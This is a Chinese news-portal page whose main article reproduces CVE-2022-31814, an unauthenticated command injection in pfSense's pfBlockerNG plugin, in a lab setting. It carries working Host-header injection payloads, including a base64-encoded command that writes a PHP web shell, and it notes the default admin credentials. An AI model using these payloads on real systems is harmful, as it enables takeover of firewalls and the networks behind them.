最新要闻
- 焦点!一排小草怎么画简单好看_一排小草怎么画简笔画
- 当前快讯:Win12正全力开发!微软重构操作系统底层:模块化设计
- 【新视野】宣称能跑100公里!男子网购电动车续航打折:法院判退一赔三
- 全球快资讯:“雪糕刺客”的仁慈!钟薛高用文心一言打造雪糕 仅售3.5元
- 即时看!口腔溃疡总不好 可能是大病预警!“偏方”都没用!
- 今日讯!比5G强10倍!工信部:中国已成立6G工作组推动关键技术研究
- 全球视点!韩瑟冻干粉怎么样_韩瑟化妆品怎么样
- 果然来了!电商偷跑索尼PS5 Slim游戏机:新外观 更轻薄
- 全球热头条丨SSD性能狂飙 追赶DDR5内存 PCIe 6.0硬盘预计2026年问世
- 听到吧唧嘴就抓狂:一男子已4年不理家人
- 头条:德国掀桌 欧盟让步 “2035禁燃令”为何不再禁燃油车?
- 男子测智商竟被推荐花98元包月:付了钱也没看到结果
- 【独家焦点】郑氏点银:黄金有望震荡冲1980,原油背离逼空反弹待回落
- 环球微资讯!玩家期待已久!任天堂限定版Switch来了
- 全球今日报丨不拍蒜也断?张小泉斩骨刀斩骨时断裂 客服:与使用力度、角度有关
- 车被撞废人完好无损!比亚迪汉DM-i车主转头定了一台海豹
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
世界动态:PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
概述
PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞
pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件
(资料图片)
FreeBSD 是一种类UNIX操作系统
pfBlockerNG是一个pfSense的插件(默认不安装),提供了广告、恶意内容和地理拦截功能。
版本
pfSense 2.6.0
pfBlockerNG<=2.1.4_26
漏洞代码分析
位置/usr/local/www/pfblockerng/www/index.php有如下代码:
// Query DNSBL(邮件黑名单) Alias for Domain List.$query = str_replace(".", "\.", htmlspecialchars($_SERVER["HTTP_HOST"])); exec("/usr/bin/grep -l " \"{$query} 60 IN A" /var/db/pfblockerng/dnsblalias/*", $match);
$_SERVER["HTTP_HOST"]是一个用户可控的输入,攻击者通过host 头来修改该参数
即/usr/bin/grep -l " "[用户可控] 60 IN A" /var/db/pfblockerng/dnsblalias/*
/usr/bin/grep
/usr/bin/grep "要匹配的字符串" "文件的路径"
-l, --files-with-matches print only names of FILEs containing matches,打印仅包含匹配项字符串的文件名
用法如下图:
拼接命令
验证payload可行性
/usr/bin/grep -l " \"" *; sleep 5 ;"60 IN A" /var/db/pfblockerng/dnsblalias/*
可见start response timer时间延迟了约5s
本地执行命令测试如下图
默认情况下,pfSense中没有安装“base64-d”二进制文件,但python3.8安装了,因此,我们能够编写和解码base64有效载荷,并将所有内容传输到php-cli二进制文件中:
测试的php代码
base64编码
PD9waHAgZWNobygiSEVMTCIpPz4K
python解码
python -m base64 -d
然后传输到php
| php
拼接起来的命令为:
/usr/bin/grep -l " \"" *;echo "PD9waHAgZWNobygiSEVMTCIpPz4K"|python3.8 -m base64 -d|php ;"60 IN A" /var/db/pfblockerng/dnsblalias/*
结果如图,成功解析php代码并输出了HELL
构造后门
php代码:
";fwrite($a,$t);fclose($a);?>
passthru函数
php端
$path="python 脚本绝对路径/脚本文件名.py "; //注意:末尾要加一个空格,否则传参失败$params = "要传入python脚本的参数"; //传递给python脚本的入口参数passthru($path.$params." ".$params2);
python端
import sysparams = sys.argv[1] #即为获取到的PHP传入python的接口参数
通过以上即可实现php通过passthru函数来调用执行Python脚本
base64编码
PD9waHAgJGE9Zm9wZW4oIi91c3IvbG9jYWwvd3d3L3N5c3RlbV9hZHZhbmNlZF9jb250cm9sLnBocCIsInciKSBvciBkaWUoKTskdD0nPD9waHAgcHJpbnQocGFzc3RocnUoICRfR0VUWyJjIl0pKTs/Pic7ZndyaXRlKCRhLCR0KTtmY2xvc2UoICRhKTs/Pgo=
拼接起来的命令为:
/usr/bin/grep -l " \"" *;echo "PD9waHAgJGE9Zm9wZW4oIi91c3IvbG9jYWwvd3d3L3N5c3RlbV9hZHZhbmNlZF9jb250cm9sLnBocCIsInciKSBvciBkaWUoKTskdD0nPD9waHAgcHJpbnQocGFzc3RocnUoICRfR0VUWyJjIl0pKTs/Pic7ZndyaXRlKCRhLCR0KTtmY2xvc2UoICRhKTs/Pgo="|python3.8 -m base64 -d|php ;"60 IN A" /var/db/pfblockerng/dnsblalias/*
成功注入
在网站上访问该木马文件,成功getshell
最后拿ihteam的脚本跑一下,成功rce
漏洞环境搭建
新建虚拟机,选择FreeBSD
配置如下,直接使用从官网下好的pfsense的iso文件
打开然后默认enter
安装好重启后,选2配置LAN的ip,配好后如下图:
然后浏览器直接输入192.168.153.139即可访问web界面
输入默认账户admin/pfsense完成登录
进入后选择配置向导
配置网络
到第四步配置如下:
后面默认,然后成功上网
启动SSH服务
系统-高级选项-管理员访问-安全shell下
启用安全ssh和允许代理转发的启用ssh-代理转发支持。然后xshell连接对应ip地址,用户是root即可连接
安装python开发环境
[2.6.0-RELEASE][root@pfSense.home.arpa]/etc/pkg: pkg search pythonfrr7-pythontools-7.5.1_3 Provide configuration reload functionality for FRRpy38-gitpython-3.1.24 Python Git Librarypython38-3.8.12_1 Interpreted object-oriented programming langua[2.6.0-RELEASE][root@pfSense.home.arpa]/etc/pkg: pkg install python38-3.8.12_1
试了python,python3,python38都没找到指令
最后进入/usr/local/bin目录下查看,发现是python3.8,如下图
配置pfBlockerNG插件
插件管理里搜索pfBlockerNG安装,只找到3.2.0_3版本的,先装上
github上找到2.1.4_26版本的pfBlockerNG插件
https://github.com/pfsense/FreeBSD-ports/tree/devel/net
https://github.com/pfsense/FreeBSD-ports/commit/b57e24307dd32679f55dd7e38dc29910168886a4
然后点进对应版本的freebsd-port下载
解压zip包的net/pfsense-pkg-pfBlockerNG,找到pfBlockerNG的index.php文件
ps:因为漏洞只出现在该文件中,所以直接把2.1.4_26版本的index.php文件下载下来上传到防火墙系统里覆盖已安装的3.2.0_3版本的index.php就行
在这个地方上传文件
成功上传返回路径
然后打开命令行,使新上传的index.php文件直接覆盖3.2.0_3版本的
mv /tmp/index.php /usr/local/www/pfblockerng/www/index.php
参考链接
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
PHP通过passthru()函数实现与python脚本的交互
payload:pfBlockerNG 2.1.4_26 - 远程代码执行 (RCE) - PHP 网络应用程序漏洞利用 (exploit-db.com)
开源防火墙pfSense的安装及初始化
pfsense配置网络
关键词:
-
世界动态:PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
PfSensepfBlockerNG未授权RCE漏洞(CVE-2022-31814)概述PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞pfSense是一个基于FreeB
来源: -
热点!Unity中基于EPPLUS的Excel转换以及Json数据读取
摘要:主要使用Epplus的的表格转换功能,将表格转换成Json,而Unity中Json的使用要搭配对应结构的类,故...
来源: -
全球速讯:c# 对序列化类XMLSerializer 二次封装泛型化方便了一些使用的步骤
原文作者:aircraft原文链接:https: www cnblogs com DOMLX p 17270107 html加工的泛型类如下:usingSystem;usingSyste
来源: 世界动态:PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
热点!Unity中基于EPPLUS的Excel转换以及Json数据读取
全球速讯:c# 对序列化类XMLSerializer 二次封装泛型化方便了一些使用的步骤
新华社权威快报|首次纳入肝素类药品 第八批药品集采平均降价56%
焦点!一排小草怎么画简单好看_一排小草怎么画简笔画
当前快讯:Win12正全力开发!微软重构操作系统底层:模块化设计
【新视野】宣称能跑100公里!男子网购电动车续航打折:法院判退一赔三
全球快资讯:“雪糕刺客”的仁慈!钟薛高用文心一言打造雪糕 仅售3.5元
即时看!口腔溃疡总不好 可能是大病预警!“偏方”都没用!
今日讯!比5G强10倍!工信部:中国已成立6G工作组推动关键技术研究
pthread库实现简单并行程序:Hello
全球焦点!日本央行官员暗示调整YCC政策 日债收益率周三全线回落
全球快资讯:净利润同比增长超62% 中国石油2022年业绩创历史最好水平
全球视点!韩瑟冻干粉怎么样_韩瑟化妆品怎么样
果然来了!电商偷跑索尼PS5 Slim游戏机:新外观 更轻薄
全球热头条丨SSD性能狂飙 追赶DDR5内存 PCIe 6.0硬盘预计2026年问世
听到吧唧嘴就抓狂:一男子已4年不理家人
头条:德国掀桌 欧盟让步 “2035禁燃令”为何不再禁燃油车?
男子测智商竟被推荐花98元包月:付了钱也没看到结果
【独家焦点】郑氏点银:黄金有望震荡冲1980,原油背离逼空反弹待回落
【天天快播报】记录--开局一张图,构建神奇的 CSS 效果
java泛型和通配符
环球微资讯!玩家期待已久!任天堂限定版Switch来了
全球今日报丨不拍蒜也断?张小泉斩骨刀斩骨时断裂 客服:与使用力度、角度有关
车被撞废人完好无损!比亚迪汉DM-i车主转头定了一台海豹
环球快资讯丨为何Redmi敢首发高通第二代骁龙7+?员工解释原因
男子驾车途中昏迷撞走公司大门 罪魁祸首竟是一只马蜂
全球看热讯:惠州治皮肤过敏较好的医院
全球微头条丨用 Go 剑指 Offer 07. 重建二叉树
快资讯:IDEA使用技巧和注册教程
全网最详细中英文ChatGPT-GPT-4示例文档-最强JS助手聊天机器人应用从0到1快速入门——官网推荐的48种最佳应用场景(附python/node.js/
全球快看点丨下载安装MyAQL数据库8.0.30
NX二次开发:Checkmate例子根据dfa文件检查模型数据
天天即时看!广东佛山发生3.4级地震 广州有震感!你感受到没
环球微动态丨火狐良心!至少支持Win7/8.1到2024年第3季度
天天快看点丨质量堪忧 多批次行车记录仪抽检不合格 纽曼上黑榜
天天通讯!360版ChatGPT要来了!周鸿祎:大家给起个名字
焦点简讯:男子回应合成迪丽热巴视频来龙去脉:不想跟其他博主同质化
即时:钟薛高推出3.5元雪糕上市时间
MySQL的安装
世界资讯:python中函数的返回值详解
环球速读:关于Web的欢迎页面的开发设置
焦点热讯:Whats's New In Seata 1.6.x
环球短讯!Powerpoint教程_编程入门自学教程_菜鸟教程-免费教程分享
热点评!首批两只新能源领域REITs上市首日均收涨
头条:前搜狗CEO王小川成立人工智能公司:中国需要自己的OpenAI
观速讯丨美团回应限制大龄外卖骑手:入职年龄并未调整 能干到57岁
环球快报:经济学家林毅夫:AI可让人们享受生活 未来每周只工作一天
历史上首次!佳能将推可自动对焦的移轴镜头
全球热点!关注!有答复了,《关于加快发展文化创意产业,培育福鼎经济新亮点的建议》。
lmxcms代码审计学习
【天天播资讯】0功耗电子纸数字海报问世:不换画面不耗电
今日视点:30年大品牌 金邦2TB SSD到手549元:长寿TLC+PCIe 4.0性能
中国高铁首次出海!雅万高铁全线轨道铺通:最高时速350公里
每日报道:比亚迪汽车毛利率25.9%!李想夸赞:比特斯拉强太多
全球速递!俄亥俄河一载1400吨有毒物质驳船沉没:尚不清楚是否发生泄漏
世界报道:太极股份:截止2023年3月20日,公司的股东户数为36798户
Go语言:编写一个 WebsiteRacer 的函数,用来对比请求两个 URL 来「比赛」,并返回先响应的 URL。如果两个 URL 在 10 秒内都未返回结果
全球实时:一文带你搞懂如何优化慢SQL
焦点快报!Dijkstar-And-Astar算法
用上ChatGPT的这几个功能,你的开发效率不高都难
联想y400什么时候上市的?联想y400笔记本配置
地下城与勇士龙年套装哪个好?地下城与勇士龙年套装有几个宝珠?
HTCG28什么时候上市的?HTCG28手机参数
华为C8813Q如何装sim卡?华为C8813Q手机参数
gprs套餐费是什么意思?怎么关闭GPRS套餐?
楼市回暖背后:多城二手房在售量持续增加
环球关注:编写高质量c#代码的10个建议
环球即时看!插入排序
【世界速看料】【Visual Leak Detector】配置项 StackWalkMethod
环球新消息丨vivo将整合旗下iQOO手机:开启降本增效
王传福:比亚迪目标年底成为中国最大汽车制造商
全球热讯:全球最大游戏展危险了!世嘉、腾讯均宣布不参加本届E3
绿巨人前女友15年后回归漫威!《美国队长4》新剧照曝光:黑人美队现身
环球即时看!联名高达!ROG游戏手机7系列来了:二代骁龙8+6000mAh电池
全球视讯!中国代表敦促个别国家立即解除对叙利亚单边制裁
天天微动态丨KubeVela 1.7 版本解读:接管你的已有工作负载
焦点报道:接通率维持 66% 以上,为什么火山引擎 VeDI 能让企业智能外呼不再难?
【全球快播报】《Python编程快速上手—让繁琐工作自动化》实践项目答案:第四章
天天简讯:四方达(300179)3月28日主力资金净卖出861.62万元
微信QQ出现功能异常 官方紧急修复:微信支付等功能已恢复
天天速看:男子陵园祭祖车雷达显示全是人 网友:啥车?我想试试
PS主机神作好评仅有32%!顽皮狗回应《最后生还者》PC优化翻车
全球速读:专家谈ChatGPT:或让更多人享受生活 一周只工作一天
干货分享|袋鼠云数栈离线开发平台在小文件治理上的探索实践之路
全球热讯:电池级碳酸锂价格腰斩 电动车会降价吗?专家给出结论
环球速看:魔法氛围拉满!Redmi Note 12 Turbo哈利波特版图赏
不用带手机 抬手就能付!微信支付尝试推出微信刷掌服务
天天要闻:开发者危机!微软GitHub启动裁员:印度工程师团队几乎整体裁撤
全球微头条丨同款商超6元/瓶!特仑苏牛奶大促:2.93元/盒相当于半价
讯息:2023华大新高考联盟3月联考各科试题及答案!_老高考老教材
如何隐藏Apache版本号和其它敏感信息
容器安全之 Dockerfile 安全扫描
zookeeper的Leader选举源码解析
焦点要闻:前端设计模式——享元模式
每日观察!使用NSIS打包超大型软件的几个注意事项
环球头条:【手慢无】速来占便宜!三星128GB存储卡仅需49.8元
全球热头条丨汽车雷达在无人陵园内显示全是人影:吓坏车主
985硕士男子失业半年 应聘道士35岁已超龄!做实习生都被拒:现送外卖
没污染!国内首款氢内燃机飞机成功首飞:中国自研